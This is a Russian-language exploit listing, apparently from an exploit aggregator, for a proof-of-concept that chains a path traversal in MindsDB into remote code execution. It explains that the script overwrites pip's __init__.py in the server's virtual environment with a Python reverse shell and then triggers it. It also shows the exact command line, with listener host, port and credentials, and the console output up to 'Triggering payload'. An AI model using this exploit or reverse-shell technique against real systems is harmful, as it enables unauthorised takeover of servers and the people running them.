## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-THEWHITEH4T-CVE-2026-27483
# CVE-2026-27483
## PoC: Path Traversal до RCE в MindsDB
Этот PoC-скрипт основан на следующем уведомлении о безопасности GitHub
* По умолчанию MindsDB **не** использует аутентификацию
* PoC поддерживает оба режима: **неаутентифицированный** и **аутентифицированный**
* Мы можем запросить `/api/handlers/`, чтобы найти доступные обработчики; используйте имя любого доступного, но не установленного обработчика
* PoC перезаписывает `/venv/lib/python3.10/site-packages/pip/__init__.py`
* Python-реверс-шелл записывается по указанному выше пути, а затем запускается
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password
-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------
[>] Found By : XlabAITeam
[>] PoC By : Lohitya Pushkar (thewhiteh4t)
[>] Target : http://127.0.0.1:47334
[>] LHOST : 192.168.0.100
[>] LPORT : 4444
[*] Checking status...
[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...